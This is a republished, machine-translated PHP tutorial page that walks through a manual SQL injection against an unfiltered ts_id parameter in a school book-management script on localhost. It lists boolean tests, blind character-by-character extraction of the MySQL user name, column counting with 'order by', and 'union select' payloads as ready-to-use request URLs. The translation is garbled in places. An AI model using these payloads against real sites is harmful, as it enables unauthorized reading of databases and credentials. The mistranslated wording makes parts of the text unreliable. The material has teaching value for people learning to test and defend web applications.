Home > Backend Development > PHP Tutorial > Simple PHP injection demonstration_PHP tutorial

Simple PHP injection demonstration_PHP tutorial

WBOY
Release: 2016-07-13 17:08:50
Original
1077 people have browsed it

A program written by an external teacher of the school, book + student management system, file names 001.php, 002.php, 003.php... (named after B) The problem lies in the line 004.php I forgot too,
Book title:
Pay attention to this sentence
, ts_id has no filtering and is waiting for us to abuse it, HOO~ (Although I know all the information about the database, I still want to do a black box test here)
LET' S GO~
http://localhost/zhd/004.php?ts_id=1 and 1=1 Normal
http://localhost/zhd/004.php?ts_id=1 and 1=2 Abnormal
Idiot injection
Judge database:
Submit http://localhost/zhd/004.php?ts_id=1/*fenggou
Return normally, indicating that the database supports /*Comment, what database supports/* Woolen cloth? MYSQL!
Read username:
Submit http://localhost/zhd/004.php?ts_id=1 and ord(mid(user(),1,1))=114/*
Return normally , user() is a built-in function of MYSQL, used to view users. Here is the first character of a user name. Yes, 114 is the "r" in ACCSLL. I am connected as root, so the statement is true (this trick Teach me your humble heart) But if the username is rijnc, am I not being cheated? So when submitting
http://localhost/zhd/004.php?ts_id=1 and ord(mid(user(),1,1))=111/* o
http://localhost/zhd /004.php?ts_id=1 and ord(mid(user(),1,1))=111/* o
http://localhost/zhd/004.php?ts_id=1 and ord(mid( user(),1,1))=116/* t
But if the password is rootrijnc, then I am speechless...
Judge the number of fields:
Submit http://localhost/zhd/004.php? ts_id=1 order by 10/*
failed, indicating that the number of fields is less than 10. Try until statement 7 is established. There are 7 fields in total. This will bring great convenience to our future joint queries. Here is a little trick: First 5, then 10, then 15, and then narrow the range little by little
Union query:
Once you know the number of fields, submit it directly http://localhost/zhd/004.php?ts_id=1 union select 1,2, 3,4,5,6,7/*
Return normally, indicating that union is supported. Change the statement and use and 1=2 to let it display the error. Hehe~~~
Submit http://localhost/ zhd/004.php?ts_id=1 and 1=2 union select 1,2,3,4,5,6,7/*

www.bkjia.comtruehttp: //www.bkjia.com/PHPjc/629814.htmlTechArticleA program written by an external teacher of the school, book + student management system, file name 001.php,002. php,003.php... (named after B) I forgot which row of 004.php the problem is, td width=118 row...
source:php.cn
Statement of this Website
The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn
Popular Tutorials
More>
Latest Downloads
More>
Web Effects
Website Source Code
Website Materials
Front End Template